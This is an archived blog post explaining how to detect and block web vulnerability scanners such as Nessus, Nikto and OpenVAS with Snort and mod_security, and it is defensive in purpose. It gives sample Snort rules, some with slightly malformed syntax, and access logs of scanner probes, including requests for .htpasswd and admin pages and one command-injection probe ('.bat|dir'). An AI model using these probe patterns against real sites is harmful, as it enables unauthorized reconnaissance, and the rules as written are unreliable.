<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>rfdslabs  </title>
<link rel="stylesheet" href="http://www.rfdslabs.com.br/wp-content/themes/coffee-desk/style.css" type="text/css" media="screen" />
<link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="http://www.rfdslabs.com.br/?feed=rss2"  />
<link rel="alternate" type="text/xml" title="RSS .92" href="http://www.rfdslabs.com.br/?feed=rss"  />
<link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="http://www.rfdslabs.com.br/?feed=atom" />
<link rel="pingback" href="http://www.rfdslabs.com.br/xmlrpc.php" />
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<meta name="Theme" content="Coffee Desk" />
<meta name="Author" content="Roam2Rome" />
<meta name="generator" content="WordPress 3.5.1" />
	<link rel='archives' title='August 2011' href='http://www.rfdslabs.com.br/?m=201108' />
	<link rel='archives' title='June 2011' href='http://www.rfdslabs.com.br/?m=201106' />
	<link rel='archives' title='March 2011' href='http://www.rfdslabs.com.br/?m=201103' />
	<link rel='archives' title='January 2011' href='http://www.rfdslabs.com.br/?m=201101' />
	<link rel='archives' title='November 2010' href='http://www.rfdslabs.com.br/?m=201011' />
	<link rel='archives' title='September 2010' href='http://www.rfdslabs.com.br/?m=201009' />
	<link rel='archives' title='March 2010' href='http://www.rfdslabs.com.br/?m=201003' />
	<link rel='archives' title='June 2009' href='http://www.rfdslabs.com.br/?m=200906' />
	<link rel='archives' title='January 2009' href='http://www.rfdslabs.com.br/?m=200901' />
	<link rel='archives' title='December 2008' href='http://www.rfdslabs.com.br/?m=200812' />
	<link rel='archives' title='October 2008' href='http://www.rfdslabs.com.br/?m=200810' />
	<link rel='archives' title='September 2008' href='http://www.rfdslabs.com.br/?m=200809' />
	<link rel='archives' title='August 2008' href='http://www.rfdslabs.com.br/?m=200808' />
	<link rel='archives' title='July 2008' href='http://www.rfdslabs.com.br/?m=200807' />
	<link rel='archives' title='June 2008' href='http://www.rfdslabs.com.br/?m=200806' />
	<link rel='archives' title='May 2008' href='http://www.rfdslabs.com.br/?m=200805' />
	<link rel='archives' title='April 2008' href='http://www.rfdslabs.com.br/?m=200804' />
	<link rel='archives' title='March 2008' href='http://www.rfdslabs.com.br/?m=200803' />
	<link rel='archives' title='January 2008' href='http://www.rfdslabs.com.br/?m=200801' />
	<link rel='archives' title='December 2007' href='http://www.rfdslabs.com.br/?m=200712' />
	<link rel='archives' title='November 2007' href='http://www.rfdslabs.com.br/?m=200711' />
	<link rel='archives' title='September 2007' href='http://www.rfdslabs.com.br/?m=200709' />
	<link rel='archives' title='August 2007' href='http://www.rfdslabs.com.br/?m=200708' />
	<link rel='archives' title='July 2007' href='http://www.rfdslabs.com.br/?m=200707' />
	<link rel='archives' title='June 2007' href='http://www.rfdslabs.com.br/?m=200706' />
	<link rel='archives' title='May 2007' href='http://www.rfdslabs.com.br/?m=200705' />
	<link rel='archives' title='April 2007' href='http://www.rfdslabs.com.br/?m=200704' />
	<link rel='archives' title='March 2007' href='http://www.rfdslabs.com.br/?m=200703' />
	<link rel='archives' title='February 2007' href='http://www.rfdslabs.com.br/?m=200702' />
	<link rel='archives' title='January 2007' href='http://www.rfdslabs.com.br/?m=200701' />

<link rel='stylesheet' id='wp-postratings-css'  href='http://www.rfdslabs.com.br/wp-content/plugins/wp-postratings/postratings-css.css?ver=1.63' type='text/css' media='all' />
<link rel='stylesheet' id='jetpack-widgets-css'  href='http://www.rfdslabs.com.br/wp-content/plugins/jetpack/modules/widgets/widgets.css?ver=20121003' type='text/css' media='all' />
<link rel='stylesheet' id='codebox-css'  href='http://www.rfdslabs.com.br/wp-content/plugins/wp-codebox/css/codebox.css?ver=0.1' type='text/css' media='screen' />
<link rel='stylesheet' id='wp-pagenavi-css'  href='http://www.rfdslabs.com.br/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<script type='text/javascript' src='http://www.rfdslabs.com.br/wp-includes/js/jquery/jquery.js?ver=1.8.3'></script>
<script type='text/javascript' src='http://www.rfdslabs.com.br/wp-content/plugins/wp-codebox/js/codebox.js?ver=0.1'></script>
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.rfdslabs.com.br/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.rfdslabs.com.br/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 3.5.1" />
<link rel='shortlink' href='http://wp.me/aeHr' />

		<style>
		<!--
			.wpi_img_left,.wpi_img_right {
				margin-bottom:15px;
				background:#eee;
				padding:2px;
				border:1px solid #d0d0d0;
			}
			.wpi_img_left {
				margin-right:15px;
				float:left;
			}
			.wpi_img_right {
				margin-left:15px;
				float:right;
			}
			*+html .wpi_img_left {
				margin-top:20px;
			}
			*+html .wpi_img_right {
				margin-top:20px;
			}
		-->
		</style>
		
<!-- Jetpack Open Graph Tags -->
<meta property="og:type" content="blog" />
<meta property="og:title" content="rfdslabs" />
<meta property="og:description" content="&quot; To temperance . . . in moderation. &quot;" />
<meta property="og:url" content="http://www.rfdslabs.com.br/" />
<meta property="og:site_name" content="rfdslabs" />


</head>
<body>


<div id="c_wrapper">
<div id="c_container">
<div id="c_header"><div class="content_header">
<div class="rsscoffee"><a href="http://www.rfdslabs.com.br/?feed=rss2" title="Add this blog to any reader"><img src="http://www.rfdslabs.com.br/wp-content/themes/coffee-desk/images/rsscoffee.PNG" BORDER=0 /></a></div>
<div class="header_logo"><span><a href="http://www.rfdslabs.com.br">rfdslabs</a></span>
<p>&#8221; To temperance . . . in moderation. &#8220;</p>
</div>
</div>


<div id="c_navigator">
<div class="navigator">
<ul>
<li><a href="http://www.rfdslabs.com.br">Home</a></li>
<li class="page_item page-item-2"><a href="http://www.rfdslabs.com.br/?page_id=2">About</a></li>
<li class="page_item page-item-10"><a href="http://www.rfdslabs.com.br/?page_id=10">Contact</a></li>
</ul>
</div>
</div><div id="c_content">
 
<div id="post_entry">
<div class="post_meta" id="post-417">
<div class="post_top"></div>
<div class="post_index">
<div class="post_title">
<div class="calendar">
<p class="date">18</p>
<p class="month">Aug</p>
</div>
<div class="post_info">
<h2><a href="http://www.rfdslabs.com.br/?p=417" rel="bookmark" title="Detect Web Scanners">Detect Web Scanners</a></h2>
<span class="author">Posted by <a href="http://www.rfdslabs.com.br/?author=1" title="Posts by rfds" rel="author">rfds</a>&nbsp;</span>
<span class="category">Published in <a href="http://www.rfdslabs.com.br/?cat=3" title="View all posts in Hacking" rel="category">Hacking</a>, <a href="http://www.rfdslabs.com.br/?cat=10" title="View all posts in Linux" rel="category">Linux</a>, <a href="http://www.rfdslabs.com.br/?cat=4" title="View all posts in Security" rel="category">Security</a></span></div>
</div>

<div class="post_content">
<p><strong>How to detect/block WebApp Scanners</strong></p>
<p>Wikipedia said:</p>
<blockquote><p>&#8220;A web application security is a program witch comunicates with a web application through the web front-end in order to identify potential security vulnerabilities in the web aplication and architectural weaknesses. &#8220;</p></blockquote>
<p>The ideia about this is to explain how it&#8217;s simple to block this kind of scanners using mod_security (windows users should try <a href="http://www.iis.net/download/UrlScan" target="_blank">URLScan</a>) and <a href="http://www.snort.org/" target="_blank">Snort</a>.<br />
In my analysis i discovery a lot of patterns that this scanners use in your execution timeline. All scanners analyzed here have the same design execution erros in the analysis process.</p>
<p>This design erros are they always send the same requests to find the vulnerabilities in your plugins base, they never change the <strong>priority</strong> order of the requests, the same <strong>User Agent</strong> etc. So, mapping this requests it&#8217;s easy to create rules to block/detect this scanners.</p>
<p>Lets start with Nessus.</p>
<p><strong><a href="http://www.nessus.org" target="_blank">Nessus Scanner</a>.</strong></p>
<p>&#8221; The Nessus® vulnerability scanner is the world-leader in active scanners, featuring high-speed discovery, configuration auditing, asset profiling, sensitive data discovery and vulnerability analysis of your security posture.&#8221; From Nessus Website.</p>
<p>I create for my analysis a profile with only the WEB APP plugins in nessus scanner.</p>
<p>The first common point in nessus web module is that he start the scanner with the same request. Look the log above:</p>
<p><a href="http://www.rfdslabs.com.br/wp-content/uploads/2010/12/Picture-43.jpg"><img src="http://www.rfdslabs.com.br/wp-content/uploads/2010/12/Picture-43-300x50.jpg" alt="" title="Nessus" width="300" height="50" class="aligncenter size-medium wp-image-515" /></a></p>
<p>
<strong>Possible Snort Rule</strong><br />
<code><br />
<em>alert tcp any any -> any any (content:"intruvert/jsp/admin/Login.jsp"; msg:"Possible Nessus Scanner"; sid 10000003;rev:1;)</em><br />
</code></p>
<p>&nbsp;</p>
<p>The same User Agent:</p>
<p><a href="http://www.rfdslabs.com.br/wp-content/uploads/2010/12/Picture-43.jpg"><img src="http://www.rfdslabs.com.br/wp-content/uploads/2010/12/Picture-43-300x50.jpg" alt="" title="Nessus" width="300" height="50" class="aligncenter size-medium wp-image-515" /></a></p>
<p><strong>Possible Snort Rule</strong><br />
<em>alert tcp any any -> any any (content:&#8221;Nessus&#8221;; msg:&#8221;Possible Nessus Scanner&#8221;; sid 10000003;rev:1;)</em></p>
<p><strong>2 Nikto</strong></p>
<p>Nikto do the same requests:</p>
<p>127.0.0.1 &#8211; - [10/Jul/2010:21:49:52 -0300] &#8220;HEAD / HTTP/1.1&#8243; 200 -<br />
127.0.0.1 &#8211; - [10/Jul/2010:21:49:52 -0300] &#8220;GET / HTTP/1.1&#8243; 200 -<br />
127.0.0.1 &#8211; - [10/Jul/2010:21:49:53 -0300] &#8220;GET / HTTP/1.0&#8243; 200 -<br />
127.0.0.1 &#8211; - [10/Jul/2010:21:49:53 -0300] &#8220;GET /JNMaauje.htpasswd HTTP/1.0&#8243; 404 215<br />
127.0.0.1 &#8211; - [10/Jul/2010:21:49:53 -0300] &#8220;GET /JNMaauje.fhp HTTP/1.0&#8243; 404 210<br />
127.0.0.1 &#8211; - [10/Jul/2010:21:49:53 -0300] &#8220;GET /JNMaauje.xsql HTTP/1.0&#8243; 404 211<br />
127.0.0.1 &#8211; - [10/Jul/2010:21:49:53 -0300] &#8220;GET /JNMaauje.xml+ HTTP/1.0&#8243; 404 211</p>
<p><strong>OpenVAS With Web App Plugins</strong></p>
<p>127.0.0.1 &#8211;  &#8220;GET / HTTP/1.0&#8243; 200 454 &#8220;-&#8221; &#8220;-&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET / HTTP/1.0&#8243; 200 454 &#8220;-&#8221; &#8220;-&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET / HTTP/1.1&#8243; 200 461 &#8220;-&#8221; &#8220;-&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET / HTTP/1.1&#8243; 200 454 &#8220;-&#8221; &#8220;-&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET /limesurvey/admin/admin.php HTTP/1.1&#8243; 404 502 &#8220;-&#8221; &#8220;Mozilla/4.75 [en] (X11, U; Nessus)&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET /phpsurveyor/admin/admin.php HTTP/1.1&#8243; 404 503 &#8220;-&#8221; &#8220;Mozilla/4.75 [en] (X11, U; Nessus)&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET /survey/admin/admin.php HTTP/1.1&#8243; 404 498 &#8220;-&#8221; &#8220;Mozilla/4.75 [en] (X11, U; Nessus)&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET //admin/admin.php HTTP/1.1&#8243; 404 491 &#8220;-&#8221; &#8220;Mozilla/4.75 [en] (X11, U; Nessus)&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET /cgi-bin/admin/admin.php HTTP/1.1&#8243; 404 499 &#8220;-&#8221; &#8220;Mozilla/4.75 [en] (X11, U; Nessus)&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET /scripts/admin/admin.php HTTP/1.1&#8243; 404 499 &#8220;-&#8221; &#8220;Mozilla/4.75 [en] (X11, U; Nessus)&#8221;<br />
127.0.0.1 &#8211;  &#8220;GET /admin/admin.php HTTP/1.1&#8243; 404 491 &#8220;-&#8221; &#8220;Mozilla/4.75 [en] (X11, U; Nessus)&#8221;</p>
<p><strong>Nikto Web Scanner With IDSEVASION</strong></p>
<p>127.0.0.1 &#8211; - [09/Nov/2010:09:08:09 -0300] &#8220;HEAD / HTTP/1.1&#8243; 200 315 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:Port Check)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET / HTTP/1.1&#8243; 200 491 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:getinfo)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.asa HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.html+ HTTP/1.1&#8243; 404 527 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.nsf HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.prf HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.cellsprint HTTP/1.1&#8243; 404 532 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.xbb HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.TPF HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.CGI HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.htw HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:10 -0300] &#8220;GET /5pgWiDQ2.vts HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;</p>
<p>127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;HEAD / HTTP/1.1&#8243; 200 315 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:Port Check)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET / HTTP/1.1&#8243; 200 491 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:getinfo)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.csp HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.2 HTTP/1.1&#8243; 404 523 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.shm HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.idc HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.iso-ru HTTP/1.1&#8243; 404 528 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.se HTTP/1.1&#8243; 404 524 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6/ HTTP/1.1&#8243; 404 522 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.fhp HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.eml HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.dpgs HTTP/1.1&#8243; 404 526 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:06:02 -0300] &#8220;GET /R0OOgcA6.pl HTTP/1.1&#8243; 404 524 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;</p>
<p>127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;HEAD / HTTP/1.1&#8243; 200 315 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:Port Check)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET / HTTP/1.1&#8243; 200 491 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:getinfo)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.SMAIL893 HTTP/1.1&#8243; 404 530 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.dpgs HTTP/1.1&#8243; 404 526 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.iso-ru HTTP/1.1&#8243; 404 528 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.dbf HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.xsql HTTP/1.1&#8243; 404 526 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.bat|dir HTTP/1.1&#8243; 404 529 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.thtml HTTP/1.1&#8243; 404 527 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.sys HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.shtml HTTP/1.1&#8243; 404 527 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:08:49 -0300] &#8220;GET /btHyJEDP.nn HTTP/1.1&#8243; 404 524 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:2) (Test:map_codes)&#8221;</p>
<p><strong>Without Evasions</strong></p>
<p>127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;HEAD / HTTP/1.1&#8243; 200 315 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:Port Check)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET / HTTP/1.1&#8243; 200 491 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:getinfo)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET /4BHHXLXB.jsp HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET /4BHHXLXB.printer HTTP/1.1&#8243; 404 529 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET /4BHHXLXB.utf8 HTTP/1.1&#8243; 404 526 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET /4BHHXLXB.password HTTP/1.1&#8243; 404 530 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET /4BHHXLXB.php HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET /4BHHXLXB.iso8859-8 HTTP/1.1&#8243; 404 531 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET /4BHHXLXB.10:100 HTTP/1.1&#8243; 404 528 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET /4BHHXLXB.properties HTTP/1.1&#8243; 404 532 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:17 -0300] &#8220;GET /4BHHXLXB.pt-br HTTP/1.1&#8243; 404 527 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;</p>
<p>127.0.0.1 &#8211; - [09/Nov/2010:09:09:53 -0300] &#8220;HEAD / HTTP/1.1&#8243; 200 315 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:Port Check)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:54 -0300] &#8220;GET / HTTP/1.1&#8243; 200 491 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:getinfo)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:54 -0300] &#8220;GET /FFrjb35O.bin HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:54 -0300] &#8220;GET /FFrjb35O.pwd HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:54 -0300] &#8220;GET /FFrjb35O.TXT HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:54 -0300] &#8220;GET /FFrjb35O.es HTTP/1.1&#8243; 404 524 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:54 -0300] &#8220;GET /FFrjb35O.log HTTP/1.1&#8243; 404 525 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:54 -0300] &#8220;GET /FFrjb35O.tw HTTP/1.1&#8243; 404 524 &#8220;-&#8221; &#8220;Mozilla/4.75<br />
(Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;<br />
127.0.0.1 &#8211; - [09/Nov/2010:09:09:54 -0300] &#8220;GET /FFrjb35O.2 HTTP/1.1&#8243; 404 523 &#8220;-&#8221; &#8220;Mozilla/4.75 (Nikto/2.1.3) (Evasions:None) (Test:map_codes)&#8221;</p>
<span id="post-ratings-417" class="post-ratings" data-nonce="988cd028a0"><img id="rating_417_1" src="http://www.rfdslabs.com.br/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif" alt="1 Star" title="1 Star" onmouseover="current_rating(417, 1, '1 Star');" onmouseout="ratings_off(2.3, 3, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_417_2" src="http://www.rfdslabs.com.br/wp-content/plugins/wp-postratings/images/stars_crystal/rating_on.gif" alt="2 Stars" title="2 Stars" onmouseover="current_rating(417, 2, '2 Stars');" onmouseout="ratings_off(2.3, 3, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_417_3" src="http://www.rfdslabs.com.br/wp-content/plugins/wp-postratings/images/stars_crystal/rating_half.gif" alt="3 Stars" title="3 Stars" onmouseover="current_rating(417, 3, '3 Stars');" onmouseout="ratings_off(2.3, 3, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_417_4" src="http://www.rfdslabs.com.br/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="4 Stars" title="4 Stars" onmouseover="current_rating(417, 4, '4 Stars');" onmouseout="ratings_off(2.3, 3, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /><img id="rating_417_5" src="http://www.rfdslabs.com.br/wp-content/plugins/wp-postratings/images/stars_crystal/rating_off.gif" alt="5 Stars" title="5 Stars" onmouseover="current_rating(417, 5, '5 Stars');" onmouseout="ratings_off(2.3, 3, 0);" onclick="rate_post();" onkeypress="rate_post();" style="cursor: pointer; border: 0px;" /> (<strong>6</strong> votes, average: <strong>2.33</strong> out of 5)<br /><span class="post-ratings-text" id="ratings_417_text"></span></span>
<span id="post-ratings-417-loading"  class="post-ratings-loading"><img src="http://www.rfdslabs.com.br/wp-content/plugins/wp-postratings/images/loading.gif" width="16" height="16" alt="Loading ..." title="Loading ..." class="post-ratings-image" />&nbsp;Loading ...</span>

</div>
<div class="post_comment_counter">
<div class="coms_count"><a href="http://www.rfdslabs.com.br/?p=417#comments">no comment</a></div>
</div>

</div>
